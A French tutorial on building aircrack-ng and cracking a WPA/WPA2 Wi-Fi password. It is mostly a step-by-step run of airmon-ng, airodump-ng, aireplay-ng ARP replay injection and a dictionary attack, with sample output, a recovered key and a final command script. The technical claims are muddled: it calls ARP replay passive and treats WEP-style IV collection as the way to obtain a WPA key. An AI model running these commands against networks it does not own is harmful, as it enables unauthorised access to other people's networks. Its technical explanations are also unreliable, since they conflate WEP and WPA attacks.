Aircrack-ng est essentiellement une suite logicielle réseau qui a été conçue pour atteindre les objectifs suivants :
Notez que le présent didacticiel n'est pas un guide exhaustif, il vise plutôt à acquérir quelques compétences de base pour tester la sécurité de votre propre réseau et vous familiariser avec les concepts.
L'attaque décrite ci-dessous est basée sur une technique passive (attaque par relecture de requête ARP) et se concentre sur les distributions basées sur Debian en supposant que vous disposez d'une carte sans fil fonctionnelle avec des pilotes déjà corrigés pour l'injection.
Aircrack-ng peut être installé sur un système d'exploitation basé sur Debian en compilant le code source (pour plus de détails, vous pouvez visiter le site officiel).
Vous trouverez ci-dessous des instructions pour installer les exigences de base pour créer aircrack-ng pour les systèmes d'exploitation basés sur Debian.
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
Obtenez la dernière copie d'aircrack-ng :
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
Pour créer aircrack-ng, le système de construction Autotools est utilisé. Tout d'abord, ./configure
le projet pour la construction avec les options appropriées :
$ autoreconf -i
$ ./configure --with-experimental
Ensuite, compilez le projet avec la commande make
et utilisez la cible « installation » parmi les cibles supplémentaires répertoriées ci-dessous pour terminer l'installation.
make check
make integration
make install
make uninstall
Le but de cette étape garantit que votre carte prend en charge avec succès l’injection. En supposant que le nom de votre interface soit "wlan0" (vous pouvez le récupérer en tapant iwconfig
sur le terminal), tapez la commande suivante :
# aireplay-ng --test wlan0
Le système répond :
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
Cela confirme que votre carte peut injecter des paquets.
La première chose à faire est de rechercher une cible potentielle en mettant votre carte sans fil en mode moniteur à l'aide de airmon-ng
. Cependant, il est fortement recommandé de kill
tous les processus interférents avant d’utiliser la suite aircrack-ng.
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
Ensuite, il est possible d'activer le mode moniteur utilisé pour créer une autre interface (mon0) :
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
Vous remarquerez que « wlan0 » a été mis avec succès en mode moniteur. Ensuite, démarrez airodump-ng
pour rechercher les réseaux :
# airodump-ng mon0
Localisez le réseau sans fil que vous souhaitez pirater et notez son BSSID et son canal à partir de la sortie suivante :
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
Notez que la partie supérieure de la sortie répertorie les informations sur les points d'accès à portée et la partie inférieure répertorie les clients connectés aux points d'accès correspondants.
Ouvrez une autre session de console pour capturer les vecteurs initiaux générés par la cible et enregistrer le résultat dans un fichier :
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
où -c 10
est le canal du réseau sans fil, --bssid 08:00:BF:E6:31:2E
est l'adresse MAC du point d'accès, -w output-file
définit les fichiers de sortie qui contiendront les vecteurs d'initialisation, et mon0
est le nom de l'interface.
Le système répond :
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
Après l'exécution de la commande, divers fichiers seront générés.
L'attaque classique par relecture de requêtes ARP est le moyen le plus efficace de générer de nouveaux vecteurs d'initialisation et fonctionne de manière très fiable. Le but de cette étape est de démarrer aireplay-ng
dans un mode qui écoute les requêtes ARP puis les réinjecte au point d'accès. Gardez vos airodump-ng
et aireplay-ng
en cours d'exécution, ouvrez un autre terminal et exécutez l'attaque de relecture de requête ARP :
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
Vous pouvez vérifier si les paquets sont injectés en regardant l'écran airodump-ng
.
À ce stade, vous devriez pouvoir obtenir la clé WPA à partir des vecteurs d'initialisation rassemblés lors des étapes précédentes. Pour effectuer cette attaque, vous avez besoin d'une liste de mots et si le mot de passe réseau ne figure pas dans le fichier Word, vous ne déchiffrez pas le mot de passe. Notez que la plupart des routeurs WPA/WPA2 sont livrés avec des mots de passe aléatoires forts de 12 caractères que de nombreux utilisateurs (à juste titre) laissent inchangés. Si vous essayez de déchiffrer l'un de ces mots de passe, je vous recommande d'utiliser les listes de mots de passe de longueur WPA.
Ouvrez une autre session de console et tapez :
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output * .cap
où -a2
spécifie le mode d'attaque pour WPA/WPA2-PSK, -w wordlist.txt
fait référence à votre propre liste de mots de dictionnaire et output*.cap
sélectionne tous les fichiers de sortie avec l'extension .cap
.
Voici le résultat d’une attaque réussie :
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
Vous trouverez ci-dessous la liste de toutes les commandes nécessaires pour pirater un réseau WPA/WPA2.
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Ce tutoriel a été réalisé à des fins éducatives uniquement, je ne favorise pas les pratiques malveillantes et je ne serai pas responsable des activités illégales.